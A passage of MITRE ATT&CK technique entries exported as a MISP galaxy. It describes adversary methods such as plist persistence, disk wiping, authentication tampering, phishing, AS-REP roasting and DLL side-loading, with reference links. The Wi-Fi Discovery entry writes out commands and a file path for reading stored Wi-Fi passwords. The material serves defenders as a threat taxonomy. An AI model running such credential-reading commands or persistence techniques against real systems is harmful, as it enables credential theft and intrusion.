Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple’s Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](Launch Daemon(https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).

For example, adversaries can add a malicious application path to the ~/Library/Preferences/com.apple.dock.plist file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)

The tag is: misp-galaxy:mitre-attack-pattern="Plist File Modification - T1647"

Table 5948. Table References

Links

https://attack.mitre.org/techniques/T1647

https://fileinfo.com/extension/plist

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf

Disk Structure Wipe - T1487

Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487"

Table 5949. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1487

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Disk Content Wipe - T1488

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488"

Table 5950. Table References

Links

https://attack.mitre.org/techniques/T1488

https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.justice.gov/opa/press-release/file/1092091/download

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

Modify Authentication Process - T1556

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556"

Table 5951. Table References

Links

https://adsecurity.org/?p=2053

https://attack.mitre.org/techniques/T1556

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://www.secureworks.com/research/skeleton-key-malware-analysis

https://xorrior.com/persistent-credential-theft/

Uninstall Malicious Application - T1576

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

  • Abusing device owner permissions to perform silent uninstallation using device owner API calls.

  • Abusing root permissions to delete files from the filesystem.

  • Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576"

Table 5952. Table References

Links

https://attack.mitre.org/techniques/T1576

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

Compromise Application Executable - T1577

Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.

There are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file’s signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user’s knowledge.(Citation: Guardsquare Janus)

Adversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)

Adversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577"

Table 5953. Table References

Links

https://attack.mitre.org/techniques/T1577

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures

Search Closed Sources - T1597

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597"

Table 5954. Table References

Links

https://attack.mitre.org/techniques/T1597

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Phishing for Information - T1598

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598"

Table 5955. Table References

Links

https://attack.mitre.org/techniques/T1598

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://github.com/ryhanson/phishery

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

https://www.proofpoint.com/us/threat-reference/email-spoofing

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

Network Boundary Bridging - T1599

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599"

Table 5956. Table References

Links

https://attack.mitre.org/techniques/T1599

https://securelist.com/lazarus-threatneedle/100803/

At (Linux) - T1053.001

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)

An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.

Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)

The tag is: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001"

Table 5957. Table References

Links

https://attack.mitre.org/techniques/T1053/001

https://gtfobins.github.io/gtfobins/at/

https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

Mark-of-the-Web Bypass - T1553.005

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005"

Table 5958. Table References

Links

https://attack.mitre.org/techniques/T1553/005

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316

https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

Right-to-Left Override - T1036.002

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)

Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](Malicious File(https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002"

Table 5959. Table References

Links

https://attack.mitre.org/techniques/T1036/002

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/

https://securelist.com/zero-day-vulnerability-in-telegram/83800/

Multi-hop Proxy - T1090.003

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"

Table 5960. Table References

Links

https://attack.mitre.org/techniques/T1090/003

https://en.wikipedia.org/wiki/Onion_routing

One-Way Communication - T1102.003

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"

Table 5961. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/003

Wi-Fi Discovery - T1016.002

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through netsh wlan show profiles to enumerate Wi-Fi names and then netsh wlan show profile “Wi-Fi name” key=clear to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to wlanAPI.dll [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)

On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)

The tag is: misp-galaxy:mitre-attack-pattern="Wi-Fi Discovery - T1016.002"

Table 5962. Table References

Links

https://attack.mitre.org/techniques/T1016/002

https://mackeeper.com/blog/find-wi-fi-password-on-mac/

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/

https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/

https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/

https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials

Drive-by Target - T1608.004

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:

  • Inserting malicious scripts into web pages or other user controllable web content such as forum posts

  • Modifying script files served to websites from publicly writeable cloud storage buckets

  • Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))

In addition to staging content to exploit a user’s web browser, adversaries may also stage scripting content to profile the user’s browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004"

Table 5963. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/techniques/T1608/004

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Non-Standard Encoding - T1132.002

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002"

Table 5964. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132/002

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

SID-History Injection - T1134.005

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005"

Table 5965. Table References

Links

https://adsecurity.org/?p=1772

https://attack.mitre.org/techniques/T1134/005

https://msdn.microsoft.com/library/ms677982.aspx

https://msdn.microsoft.com/library/ms679833.aspx

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

https://technet.microsoft.com/library/ee617241.aspx

One-Way Communication - T1481.003

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1481.003"

Table 5966. Table References

Links

https://attack.mitre.org/techniques/T1481/003

DLL Side-Loading - T1574.002

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002"

Table 5967. Table References

Links

https://attack.mitre.org/techniques/T1574/002

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

AS-REP Roasting - T1558.004

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)

Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"

Table 5968. Table References

Links

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558/004

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

Re-opened Applications - T1547.007

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.

